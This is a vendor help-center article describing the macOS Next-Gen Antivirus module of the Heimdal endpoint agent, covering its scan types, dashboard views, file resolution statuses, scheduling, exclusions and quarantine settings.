Heimdal Assistance and Support Help Center home page

Articles in this section

Haven't Tried Heimdal Yet?

Start Free Trial 30-day Free Trial. Offer valid only for companies.

Next-Gen Antivirus (macOS)

Last updated

In this article, you will learn everything you need to know about the Next-Gen Antivirus module.

1. Description
2. How does Next-Gen Antivirus work?
3. HEIMDAL Agent - Next-Gen Antivirus
4. Next-Gen Antivirus view
5. Next-Gen Antivirus settings

DESCRIPTION

Next-Gen Antivirus is the reactive protection side of our product suite.  The Next-Gen Antivirus solution reacts to infected files found on the system. Next-Gen Antivirus combines the techniques known by both traditional and Next-Gen Antivirus to detect and remediate viruses, APTs, financial fraud, ransomware, and data leaks. It complements the DNS Security - Endpoint product to offer all-around protection. It offers a centralized management interface across all devices for easy corporate client management. It is flexible and easy to use, and it offers a wide variety of scanning profiles to fit your corporate needs. 
Next-Gen Antivirus leverages Apple's built-in XProtect engine (enforcing the YARA rules for its signature-based detection capabilities) that provides a strong baseline of protection by scanning files at key moments - for example, when an app is downloaded or first executed. The YARA rules are composed of metadata (information about the rule), strings (specific patterns), and a condition (a logical expression that must be met for the file to be classified as a match). Additionally, XProtect does not include on-demand or scheduled scanning, as it was designed to be lightweight and event-driven, but our solution includes both on-demand and scheduled antivirus scans, allowing proactive system checks at any time. At this stage, Next-Gen Antivirus does not yet scan inside archived files (such as ZIPs or RARs). 

HOW DOES NEXT-GEN ANTIVIRUS WORKS?

As a standalone Antivirus product, the Next-Gen Antivirus features a complex threat scan module that is capable of detecting viruses, trojans, riskware, heuristic threats, adware, backdoor, constructors, dialers, exploits, trash, and APCs. Besides the scan module that is available on each HEIMDAL Agent installation, the Antivirus as a concept also features a reporting and control dashboard, protection cloud, local quarantine location, and VDFs (Virus Definition Files).

HEIMDAL AGENT - NEXT-GEN ANTIVIRUS

Endpoint Detection - Next-Gen Antivirus (inside the HEIMDAL Agent) allows the end-user to run a scan or to stop a scan operation (if allowed in the Group Policy settings), and it also displays information about the detected Infections and the Quarantined files. 
ngav.PNG
The end-user who is allowed to start a scan operation can click on the Go To Scan button, where they can select a scan type from the following: 

  • Quick Scan - scans critical OS locations and the most common target folders that are known for virus activity
    /System/Library/Extensions/, /System/Library/LaunchAgents, /System/Library/LaunchDaemons, /System/Library/StartupItems, /Library/Extensions, /Library/Internet Plug-Ins, /Library/LaunchAgents, /Library/LaunchDaemons, /Library/StartupItems, /Library/PrivilegedHelperTools, /Library/Preferences/loginwindow.plist, /Library/Preference/loginitems.plist, /Library/Preference/loginwindows.plist, /Users/*/Library/Internet Plug-Ins, /Users/*/Library/LaunchAgents.
  • Active Processes Scan - scans all the processes currently running on the machine.
  • Full Scan - scans all the local files on the computer.
  • Hard Drive Scan - scans all files on the hard drive while ignoring the files on all external media types.
  • Local Drive Scan - the profile will scan all local disks, including the hard drives, optical drives, and external storage.
  • Removable Drive Scan - scans for the files that are on flash, optical, or external drives.
  • System Scan - scans the system directory.
  • Network Drive Scan - scans the network-mapped network drives (does not work with network locations). The HEIMDAL Agent detects infected files, but no actions will be performed (Quarantine/Delete) because a file located on a network cannot be moved to the local quarantine folder.   

scans.PNG

The Infected/Quarantined view displays a list of intercepted File names, the Threat type, Infection Name, Status, and Date.
infected.PNG

NEXT-GEN ANTIVIRUS view

The Next-Gen Antivirus view displays all the information collected by the HEIMDAL Agent that is running on the endpoints in your organization. The collected information refers to the detected/quarantined files intercepted by the HEIMDAL Agent's Next-Gen Antivirus engine. On the top, you see a statistic regarding the number of Infected Files, the number of Suspicious Files, and the number of Quarantined Files.

chrome_gp4EIIHXaF.png

The collected information is placed in the following views: Latest InfectionsInfection TypeHostname/InfectionsQuarantineExclude, Scan History, and Zero-Trust Execution Protection.
 

  • Latest Infections
    This view displays a table with the latest detected infections and the following details: Hostname, Username, File, MD5, Threat Category, Infection name, Status, Resolution, and Timestamp. This view allows you to select one or multiple infected files and add them to quarantine, delete them, or add them to storage.
    FlU2lurRmo.png
  • Infections Type
    This view displays a table with the infection type and the following details: Threat Category, Number of Matches, Most Targeted Hostname, Username, and Last match.
    chrome_URL77lb48d.png
  • Hostname/Infections
    This view displays a table with the hostname/infections and the following details: Hostname, Username, Highest Threat Category, Number of Matches, and Last match.
    chrome_ZObTJLluUb.png
  • Quarantine
    This view displays a table with all quarantined files and the following details: Hostname, Username, File, MD5, Threat Category, Infection Name, Status, Resolution, and Timestamp. This view allows you to select one or multiple quarantined files and remove them from quarantine or add them to storage.
    chrome_aDx0tvCLgK.png
    Quarantined files are kept for 90 days (this is the default value).
  • Exclude
    This view displays a table of all exclusions and the following details: Hostname, Username, File, MD5, Threat Category, Infection Name, Status, Resolution, and Timestamp.
    chrome_IAXP93zTBe.png
  • Scan History
    This view displays a table with each computer that was performing scan operations (only the latest scan is displayed) and the following details: Hostname, Username, Group Policy, Timestamp, New Infections Found, and Resolution. This view allows you to select one or multiple endpoints and select a scan type (Quick Scan, Full Scan, Active Processes Scan, Hard Drive Scan, Local Drive Scan, Removable Drive Scan, System Scan, Network Drive Scan). The selected scan will start on the first Group Policy check performed by the HEIMDAL Agent on the selected endpoint. 
    chrome_YUHHSHDXX6.png

The Download CSV functionality allows you to generate and download a CSV report that includes all the information in Standard or Verbose mode corresponding to each view.
The Filters functionality allows you to filter entries by Operating System. 
The files listed in the Latest Infections view, Quarantine view, and Exclude view can get one of the following Resolution statuses:
None - no action is taken on the file.
Deleted - the file is deleted.
DeletePending - the file has been selected for deletion, and it will be deleted when the HEIMDAL Agent performs a GP check.
ErrorDelete - the file has been selected for deletion, but an error occurred (the file could be in use).
ErrorQuarantine - the file has been marked to be quarantined, but an error occurred (the file could be in use).
FNOEXIST - the file has been marked to be deleted or quarantined, but does not exist in the path (it has been removed manually or is not allowed to be written on the disk drive). A file that is copied/extracted/downloaded (basically, written on the disk) will be intercepted in the Memory before being written, and it will NOT be allowed to be written. The Next-Gen Antivirus will display an infection event, and the file will not be quarantined because it will be blocked in the Memory.
Quarantined - the file has been quarantined. A file that has been quarantined will be automatically deleted after 30 days if it has not been restored.
QuarantinePending - the file has been marked to be quarantined, and this operation will take place on the next HEIMDAL Agent GP check.
DeleteQuarantinePending - the file has been selected for deletion, and this operation will be performed on the next HEIMDAL Agent GP check.
Excluded - the file has been excluded.
ExcludePending - the file has been marked to be excluded, and the operation will take place on the next HEIMDAL Agent GP check.
ExcludeQuarantinePending - the file has been marked to be excluded, and the operation will take place on the next HEIMDAL Agent GP check.
ErrorExcludeQuarantine - the file has been marked to be excluded, and an error occurred.
ErrorRemoveQuarantine - the file has been marked to be removed from the Quarantine list, and an error occurred (the file could have been deleted manually);
RemoveExclusionPending - the file has been marked to be excluded, and the operation will be performed on the next HEIMDAL  Agent GP check.
RemoveQuarantinePending - the file has been marked to be removed from the Quarantine list, and the operation will be performed on the next HEIMDAL  Agent GP check.

NEXT-GEN ANTIVIRUS settings

The Endpoint Detection - Next-Gen Antivirus will allow you or the users to perform scan operations on the endpoints in your environment to keep viruses and other threats away. 

Next-Gen Antivirus - turns ON/OFF the Next-Gen Antivirus.

General Settings

Protection Cloud - enables/disables the ability to send the file's digital fingerprint to our real-time protection cloud for further analysis and returns a fast response on whether the file is infected or safe.
Allow Manual Scan - enables/disables the ability of the end-user to start any scan directly from the HEIMDAL Agent;
Allow Cancel Scan - enables/disables the ability of the end-user to cancel any running or scheduled scan operation directly from the HEIMDAL Agent.
Default Action on detected of Infected files - can be set to Quarantine or Allow.
Default Action on detected of Suspicious files - can be set to Quarantine or Allow.
Update virus definitions interval [min] - allows you to set the update time interval for the virus definition files. The default value is 120 minutes, and it can be extended to 360 minutes. This feature is designed to check whether there are any new virus definition files (VDFs) available on the HEIMDAL servers. When a new VDF file is available, it will be automatically downloaded to the local agent database. It is recommended to have the limit set to 120 minutes to update the database as soon as possible.

chrome_ujD6zQrYJ0.png

Schedule Scan

This section allows you to schedule a scan according to your preferences. You can start creating a schedule by pressing Add New Scan button. 

chrome_RNSA22F4nA.png

Scan Profile Name - specify the name for the profile you want to create.
Scan Type - select the type of scan you wish HEIMDAL Next-Gen Antivirus to run in the created profile.

chrome_vs9tzfEw0c.png

You can set up a scheduler to run the selected Scan Type in the specified timeframe. The scheduler enables you to choose a day or multiple days during the week or the month, and the time interval when to run the selected Scan Type. 

chrome_D4catZ5UEf.png

chrome_dDluLV0YUm.png

The scheduler also allows users to opt for recurring schedules at the weekly level.

image_33.jpg

IMPORTANT
The scan profile does not apply automatically in the policy after clicking the Set Scan button. The configured scheduler needs to be confirmed by updating the policy. If the Update GP button is not clicked, the defined scan profile will be lost if the current page is left before updating the policy. Multiple scan profiles can be created inside a Group Policy. However, the scan type is exclusive. This means that it is not possible to create multiple profiles with the same scan type. For example, there cannot be 2 scan profiles to perform full scans in the same Group Policy.

Next-Gen Antivirus Exclusion List

This feature allows you to add exclusions that Next-Gen Antivirus will ignore after scanning. The Exclusion List comes with different Priorities and enables you to exclude file names, file paths, directories, or patterns (wildcards). 

chrome_DwmI5yXCmK.png

Types

Filename - allows you to specify the filename that you want to exclude (e.g., test.exe, file.doc, file.txt, example.msi);
File Path - allows you to specify the file path where the file is located on the hard drive (e.g.,/Users/test/Downloads/test.pkg).
Directory - allows you to specify a directory path to be excluded (sub-directories are automatically excluded) from scanning (e.g.,/Users/test/Downloads/).
Pattern -  allows you to specify a pattern that should be excluded from scanning. 

exclusions.PNG

Global Quarantine List

The Global Quarantine List allows you to add a file to quarantine if it is detected by the Antivirus engine (the file will be marked as Suspicious or Infected).

  • A file that is added to the Global Quarantine List based on File Name can be quarantined ONLY if the Antivirus engine detects the file as Suspicious/Infected.

  • A file that is added to the Global Quarantine List based on the File Path can be quarantined no matter of whether the Antivirus engine detects it as Suspicious/Infected or not.

  • Files added by File Path will be marked as Suspicious.

  • .txt files added by File Path will not work with Real-Time Scanning.

chrome_rVUfjv3f4G.png

Haven't Tried Heimdal Yet?

Start Free Trial 30-day Free Trial. Offer valid only for companies.